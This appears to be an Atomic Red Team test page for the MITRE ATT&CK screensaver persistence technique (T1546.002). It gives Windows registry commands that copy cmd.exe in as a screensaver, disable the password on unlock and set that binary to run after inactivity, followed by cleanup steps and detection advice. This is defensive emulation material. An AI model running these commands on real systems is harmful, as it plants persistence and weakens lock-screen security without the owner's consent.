T1546.002 - Screensaver

T1546.002 - Screensaver#

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32</code>, and C:\Windows\sysWOW64</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.


The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop</code>) and could be manipulated to achieve persistence:


SCRNSAVE.exe - set to malicious PE path
ScreenSaveActive - set to ‘1’ to enable the screensaver
ScreenSaverIsSecure - set to ‘0’ to not require a password to unlock
ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017)

Atomic Tests#

Atomic Test #1 - Set Arbitrary Binary as ScreensaverThis test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.#
Supported Platforms: windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with command_prompt
reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
copy C:\Windows\System32\cmd.exe "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
if 0 NEQ 0 shutdown /r /t 0




Invoke-AtomicTest T1546.002 -TestNumbers 1





Cleanup:#
reg import %userprofile%\backup.reg
del %userprofile%\backup.reg
del %SystemRoot%\System32\evilscreensaver.scr




Invoke-AtomicTest T1546.002 -TestNumbers 1 -Cleanup








Detection#
Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.


              

              
              
              
              
                
                  

    
      
      
        previous
        T1546.001 - Change Default File Association
      
    
    
      
        next
        T1546.003 - Windows Management Instrumentation Event Subscription


            
            
              
                


  
  
     Contents
  
  
    
Atomic Tests
Atomic Test #1 - Set Arbitrary Binary as ScreensaverThis test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.
Cleanup:




Detection


          
            

  
  
    

By The Jupyter Book community


  
  
  
    

  
    
      © Copyright 2022.